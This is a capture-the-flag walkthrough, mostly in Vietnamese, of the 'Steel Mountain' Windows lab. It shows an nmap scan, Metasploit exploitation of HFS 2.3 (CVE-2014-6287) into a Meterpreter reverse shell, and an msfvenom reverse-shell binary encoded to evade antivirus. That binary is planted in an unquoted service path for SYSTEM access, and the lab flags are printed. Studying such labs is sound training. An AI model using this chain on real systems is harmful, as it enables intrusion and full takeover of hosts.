Steel Mountain
Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
November 4, 2025
•
July 25, 2025
•
Easy
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Service Scanning
$ sudo nmap -A -v 10.10.93.9
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 124 Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 124 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 124 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack ttl 124 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: STEELMOUNTAIN
| NetBIOS_Domain_Name: STEELMOUNTAIN
| NetBIOS_Computer_Name: STEELMOUNTAIN
| DNS_Domain_Name: steelmountain
| DNS_Computer_Name: steelmountain
| Product_Version: 6.3.9600
|_ System_Time: 2025-07-25T06:33:41+00:00
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-07-24T06:25:59
| Not valid after: 2026-01-23T06:25:59
| MD5: 1582:11a8:377b:5b2f:d69b:06ff:dfcb:d193
| SHA-1: 0060:75ef:57d8:5495:034e:cd99:4529:372c:0b65:85f2
| -----BEGIN CERTIFICATE-----
| MIIC3jCCAcagAwIBAgIQa3bDyZRB96hGes9cvJ2uszANBgkqhkiG9w0BAQUFADAY
| MRYwFAYDVQQDEw1zdGVlbG1vdW50YWluMB4XDTI1MDcyNDA2MjU1OVoXDTI2MDEy
| MzA2MjU1OVowGDEWMBQGA1UEAxMNc3RlZWxtb3VudGFpbjCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBANER+xdyWhSwRzt93eqGnwnKDWrmOR0AyYnU6v71
| 8cB7G1/KjseZDxozdcx3BYxQ0fMddJ8CwE6+krNIjo6sjhyjV6VKo1viBTqKnaPP
| DKsbXfrntfR3xBheWAbT+0mf2O6GRwLsg95i9FUF+1s8nseRM0/HvNSJIOPzHvvS
| ObyY7aDGkJJwUdR+ODFebvKak7PAEfZdgoyIpVf6oQ5aUlZnWuNV4JU0hXL221s+
| 2H9P9M1J1c/MGLrgRzS95IfAScG4muoMrWMCl11p3aXDdtLOfn9hclE9L1XvWSdt
| YzsRhyJ57dGTw0WZDdZupPNW+G1F/DHERy3yfLVDQ/ds1ncCAwEAAaMkMCIwEwYD
| VR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBBQUAA4IB
| AQBebiQSHHKAFjCDPP9Vy8O1O5GpQKWvgwOcVs0hkCuHH5gJWuQVDAZlyy9758DO
| EW4a/chPdcf0Zo/z9xk5KXzU4dteDg3/Y2FylY778/DxoE4wWrTYlbMFg/qjCIRv
| mVh6Ewk70QnU5tzteqIkxc27m+/uKRVe4ltEAqv8YCWsSq5bNapWQhX2Slqpi9Ei
| iPai6tL8i+uapiJWIwpJfMHuoOHUCffcYmNyo+mPYwZcKwasZ0gH8eHcoUq27pOU
| rkBeOGE3mUJ6xKdaoSAEUYqVQw3afRAWk6qxwJ8o6VWF+s477Qfsr9fZ6KXdpCSf
| KGS3111ZFmWbtw3ibxvrEKTb
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-25T06:33:48+00:00; 0s from scanner time.
5985/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http syn-ack ttl 124 HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
47001/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49162/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49164/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2012
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
OS details: Microsoft Windows Server 2012 or 2012 R2Từ kết quả scan, ta biết được máy target đang chạy Windows Server 2012 hoặc 2012 R2. Trên port 80 có Microsoft IIS 8.5. Port 445 mở dịch vụ SMB, kết hợp với các cổng 135, 139 và nhiều dynamic RPC port (49152–49164. Port 3389 bật Remote Desktop (RDP). Đáng chú ý nhất là port 8080 chạy HttpFileServer (HFS) 2.3, một phiên bản có lịch sử dính nhiều exploit Remote Code Execution. Ngoài ra, có thêm dịch vụ WinRM trên port 5985 và 47001, có thể tận dụng sau khi có được credentials để leo quyền hoặc truy cập shell từ xa.
HTTP 80
Khi truy cập vào trang chính, chúng ta thấy rằng Bill Harper là nhân viên của tháng 🙂.
HTTP 8080
Port 8080 này đang chạy HFS. HTTP File Server, hay còn gọi là HFS, là một web server miễn phí được thiết kế riêng cho việc xuất bản và chia sẻ file.
Remote Code Execution
Phiên bản Rejetto HttpFileServer đang sử dụng là 2.3, tồn tại một lỗ hổng bảo mật CVE-2014-6287.
Đây là exploit 39161.py dành cho lỗ hổng này:
Meterpreter Shell as bill
Chúng ta đã khai thác thành công và truy cập được vào hệ thống thông qua Metasploit với user bill.
msf6 > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_rce_cve_2024_23692 2024-05-25 excellent Yes Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.93.9
rhosts => 10.10.93.9
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.17.21.52
lhost => 10.17.21.52
msf6 exploit(windows/http/rejetto_hfs_exec) > set lport 4242
lport => 4242
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, h
ttp
RHOSTS 10.10.93.9 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.17.21.52 yes The listen address (an interface may be specified)
LPORT 4242 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.17.21.52:4242
[*] Using URL: http://10.17.21.52:8080/HQiAmKTCR3Ej5
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /HQiAmKTCR3Ej5
[*] Sending stage (177734 bytes) to 10.10.93.9
[!] Tried to delete %TEMP%\xCfoxhId.vbs, unknown result
[*] Meterpreter session 1 opened (10.17.21.52:4242 -> 10.10.93.9:49284) at 2025-07-25 14:02:48 +0700
[*] Server stopped.
meterpreter > shellSystem Info
Dựa vào kết quả của command systeminfo, hệ thống target đang chạy Windows Server 2012 R2 Datacenter phiên bản 64-bit.
user.txt
meterpreter > shell
Process 1800 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
whoami
steelmountain\bill
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
07/25/2025 12:02 AM <DIR> .
07/25/2025 12:02 AM <DIR> ..
07/25/2025 12:02 AM <DIR> %TEMP%
02/16/2014 01:58 PM 760,320 hfs.exe
1 File(s) 760,320 bytes
3 Dir(s) 44,171,792,384 bytes free
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>cd C:\Users\bill\Desktop
cd C:\Users\bill\Desktop
C:\Users\bill\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\bill\Desktop
09/27/2019 09:08 AM <DIR> .
09/27/2019 09:08 AM <DIR> ..
09/27/2019 05:42 AM 70 user.txt
1 File(s) 70 bytes
2 Dir(s) 44,171,792,384 bytes free
C:\Users\bill\Desktop>type user.txt
type user.txt
b04763b6fcf51fcd7c13abc7db4fd365Shell as SYSTEM
PowerUp là một công cụ dùng để enumerate các vector leo quyền, được phát triển trong PowerSploit repository, có thể tìm thấy ở đây:
Vì PowerUp là một script Powershell, nên để chạy được script này, chúng ta cần có một phiên Powershell trên máy target.
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > ls
Directory: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 7/25/2025 12:02 AM %TEMP%
-a--- 2/16/2014 12:58 PM 760320 hfs.exe
-a--- 7/25/2025 12:12 AM 600580 PowerUp.ps1
PS > . .\PowerUp.ps1
PS > Invoke-AllChecksService AdvancedSystemCareService9 được phát hiện không chỉ sử dụng unquoted path, mà còn có thể được khởi động lại và quan trọng hơn, nó chạy với quyền LocalSystem. Đây là một rủi ro bảo mật nghiêm trọng, vì attacker có thể khai thác điều này để thực thi code tùy ý với đặc quyền cao nhất.
Vì user bill có quyền ghi vào thư mục C:\Program Files (x86)\IObit, nên nếu tài khoản bill bị compromise, attacker có thể đặt một file độc hại tên Advanced.exe trong thư mục này rồi kích hoạt bằng cách khởi động lại service AdvancedSystemCareService9.
Chúng ta tạo một reverse shell payload bằng msfvenom với encoder x86/shikata_ga_nai để né tránh AV detection, sau đó upload payload này lên hệ thống target bằng command upload của Meterpreter Shell.
┌──(hungnt㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.17.21.52 LPORT=4444 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe-service file: 15872 bytes
Saved as: Advanced.exemeterpreter > cd 'C:\Program Files (x86)\IObit\'
meterpreter > upload ~/Advanced.exe
[*] Uploading : /home/hungnt/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/hungnt/Advanced.exe -> Advanced.exe
[*] Completed : /home/hungnt/Advanced.exe -> Advanced.exe
meterpreter > shell
Process 1736 created.
Channel 3 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\IObit>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Program Files (x86)\IObit
07/25/2025 12:46 AM <DIR> .
07/25/2025 12:46 AM <DIR> ..
07/25/2025 12:46 AM <DIR> Advanced SystemCare
07/25/2025 12:46 AM 15,872 Advanced.exe
09/26/2019 10:35 PM <DIR> IObit Uninstaller
09/26/2019 08:18 AM <DIR> LiveUpdate
1 File(s) 15,872 bytes
5 Dir(s) 44,172,189,696 bytes freeĐể thực thi payload, trước tiên cần dừng service, sau đó khởi động lại.
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Program Files (x86)\IObit>sc query AdvancedSystemCareService9
sc query AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0Trước khi restart service, chúng ta phải thiết lập một listener để bắt kết nối reverse shell.
msf6 exploit(multi/handler) > options
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.17.21.52 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.17.21.52:4444Sau khi restart service, chúng ta đã thành công leo quyền lên SYSTEM.
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2636
FLAGS :[*] Started reverse TCP handler on 10.17.21.52:4444
[*] Command shell session 1 opened (10.17.21.52:4444 -> 10.10.137.40:49229) at 2025-07-25 14:58:34 +0700
Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
C:\Windows\system32>whoami
whoami
nt authority\systemroot.txt
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\Administrator\Desktop
10/12/2020 12:05 PM <DIR> .
10/12/2020 12:05 PM <DIR> ..
10/12/2020 12:05 PM 1,528 activation.ps1
09/27/2019 05:41 AM 32 root.txt
2 File(s) 1,560 bytes
2 Dir(s) 44,158,586,880 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80